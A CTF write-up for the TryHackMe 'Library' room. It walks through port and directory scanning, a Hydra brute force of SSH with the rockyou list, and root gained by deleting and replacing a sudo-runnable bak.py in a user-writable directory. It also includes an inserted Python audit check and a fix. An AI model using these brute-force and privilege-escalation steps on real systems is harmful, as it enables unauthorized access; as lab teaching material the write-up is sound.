TryHackMe | Library Writeup
boot2root machine for FIT and BSides Guatemala CTF
Find This Room: Library
Recon
whoami@mint:~/Desktop/THM-Lab/Library$ nmap -sV MachineIP
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
80/tcp open http syn-ack Apache httpd 2.4.18 ((Ubuntu))
1071/tcp filtered bsquare-voip no-response
25735/tcp filtered unknown no-response
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 53.19 seconds
From the scan we find that the ports for SSH and HTTP are open.
HTTP is open, so let’s run a Gobuster scan to look for interesting directories. We’ll use the common.txt wordlist, so the full command is the following.
gobuster dir -u http://MachineIP -w /usr/share/wordlists/dirb/common.txt
We are returned a list of directories.
2024/11/11 12:19:32 Starting gobuster in directory enumeration mode
/.htaccess (Status: 403) [Size: 297]
/.hta (Status: 403) [Size: 292]
/.htpasswd (Status: 403) [Size: 297]
/images (Status: 301) [Size: 315] [→ http://MachineIP/images/]
/index.html (Status: 200) [Size: 5439]
/robots.txt (Status: 200) [Size: 33]
/server-status (Status: 403) [Size: 301]
2024/11/11 12:19:43 Finished
The only interesting results are /images and /robots.txt. Let’s take a look at the home page before we check both of them.
Home page of the website
We’re looking at a blog. One of the posts is by a user named “meliodas”, and at the bottom of the page are three comments by root, www-data, and Anonymous. We may need to log in as meliodas, so let’s remember the name and check out the two paths we found in the Gobuster scan.
Contents of rockyou
This looks like a hint that a user’s password is in the rockyou wordlist. Let’s try it against the meliodas account with Hydra; the full command is the following.
hydra -l meliodas -P /usr/share/wordlists/rockyou.txt ssh://MachineIP
Within a few minutes we get our password.
Finding the password for meliodas
Now that we have the password, let’s SSH into the machine and get the user flag.
We have the user flag, so let’s try to escalate our privileges to root.
2. root.txt
The first thing I always check when looking for privilege escalation is the sudo permissions granted to our user. We can list them with “sudo -l”.
Looking at our sudo permissions
We’re allowed to use python to run a script called bak.py. Python can spawn a shell, so if we control that script we get a root shell; let’s see what’s in it.
Inside the bak.py file
We can’t write our shell into the file, as it is owned by root and we have no write permission on it. The file sits in our own directory though, and deleting a file depends on write permission to the directory rather than to the file itself, so we should be able to remove it and replace it with our exploit.
File is owned by root
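The root cause here is a sudo rule pointing at a file in a directory the invoking user controls. The following is an added audit check, not part of the original writeup, that models this with constructed (mode, uid, gid) metadata so it runs offline and without root; the /home/meliodas, /tmp and /opt layout and uid 1000 for meliodas are assumptions. It goes slightly beyond the room by checking every path component and handling the sticky-bit case.

```python
import stat
from typing import Dict, NamedTuple, Optional, Sequence

W = (stat.S_IWUSR, stat.S_IWGRP, stat.S_IWOTH)  # write bits: owner, group, other
X = (stat.S_IXUSR, stat.S_IXGRP, stat.S_IXOTH)  # search bits: owner, group, other

class Meta(NamedTuple):
    mode: int  # full st_mode, file-type bits included
    uid: int
    gid: int

def allowed(m: Meta, uid: int, gids: Sequence[int], bits) -> bool:
    """Classic Unix check: owner class wins, then group, then other; root bypasses."""
    if uid == 0:
        return True
    cls = 0 if uid == m.uid else 1 if m.gid in gids else 2
    return bool(m.mode & bits[cls])

def can_unlink(parent: Meta, child: Meta, uid: int, gids: Sequence[int]) -> bool:
    """rm/mv of an entry needs write+search on its directory; under a sticky bit
    (as on /tmp) the caller must also own the entry or the directory."""
    if uid == 0:
        return True
    if not (allowed(parent, uid, gids, W) and allowed(parent, uid, gids, X)):
        return False
    return uid in (child.uid, parent.uid) if parent.mode & stat.S_ISVTX else True

def sudo_script_risk(fs: Dict[str, Meta], script: str, uid: int,
                     gids: Sequence[int]) -> Optional[str]:
    """How uid could tamper with a sudo-runnable script, or None if it cannot.
    Every path component is checked: swapping a parent directory hijacks the path too."""
    if allowed(fs[script], uid, gids, W):
        return f"{script} is writable"
    path = script
    while path != "/":
        parent = path.rsplit("/", 1)[0] or "/"  # dirname, with "/" as the top
        if can_unlink(fs[parent], fs[path], uid, gids):
            return f"{path} can be removed and recreated ({parent} is writable)"
        path = parent
    return None

# Constructed metadata for the room's layout; uid/gid 1000 stands for meliodas.
FS = {
    "/": Meta(0o40755, 0, 0), "/home": Meta(0o40755, 0, 0), "/opt": Meta(0o40755, 0, 0),
    "/home/meliodas": Meta(0o40755, 1000, 1000),    # home directory owned by the user
    "/home/meliodas/bak.py": Meta(0o100644, 0, 0),  # root-owned: unwritable, yet replaceable
    "/tmp": Meta(0o41777, 0, 0),                    # world-writable but sticky
    "/tmp/bak.py": Meta(0o100644, 0, 0),            # root-owned under sticky /tmp: not replaceable
    "/opt/bak.py": Meta(0o100644, 0, 0),            # root-owned in a root-owned dir: the fix
}
```

Moving the script into a root-owned directory such as /opt is what turns the result to None; the sudo rule itself can stay.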
We can remove the file by using the following command.
rm -f bak.py
Let’s now create a new file named bak.py using nano and put in code to spawn a root shell.
Code to spawn our shell
With our code ready, we can use the following command to run it and get root.
Now we can change to the root directory and grab the flag.
root@ubuntu:~# cd /root
root@ubuntu:/root# ls
root.txt
root@ubuntu:/root# cat root.txt
Conclusion:
I think getting into the user account could be a bit more difficult, but other than that I think the room was good. There seem to be a few ways of getting root, which is nice. I would recommend this room to someone who wants to practice basic privilege escalation.